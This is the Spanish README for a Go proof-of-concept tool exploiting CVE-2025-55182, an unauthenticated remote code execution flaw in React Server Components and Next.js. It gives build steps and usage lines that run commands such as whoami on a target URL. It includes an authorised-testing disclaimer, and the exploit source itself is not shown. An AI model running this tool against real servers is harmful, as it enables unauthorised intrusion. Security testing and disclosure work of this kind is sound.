
Código de exploit para la vulnerabilidad RCE React2Shell (CVE-2025-55182) que afecta a React Server Components 19.0.0-19.2.0. Explota la deserialización insegura para ejecución remota de código no autenticada.
Prueba de concepto (PoC) para la vulnerabilidad de ejecución remota de código en React Server Components (RSC) / Next.js.
Existe una vulnerabilidad de ejecución remota de código sin autenticación previa en React Server Components versiones 19.0.0, 19.1.0, 19.1.1 y 19.2.0, incluidos los siguientes paquetes: react-server-dom-parcel, react-server-dom-turbopack y react-server-dom-webpack. El código vulnerable deserializa de manera insegura las cargas útiles de las solicitudes HTTP a los endpoints de Server Function.
⚠️ ADVERTENCIA: Esta herramienta es solo para pruebas de seguridad autorizadas.
go build -o exploit exploit.go
O ejecutar directamente:
go run exploit.go
./exploit -u <URL> -c <command>
-u - URL de destino (obligatorio)-c - Comando a ejecutar (por defecto: id)# Uso básico
./exploit -u https://vulnerable -c "whoami"
# Ejecutar un comando diferente
./exploit -u https://vulnerable -c "ls -la"
# Ejecutar directamente con go
go run exploit.go -u https://vulnerable -c "pwd"

La herramienta muestra: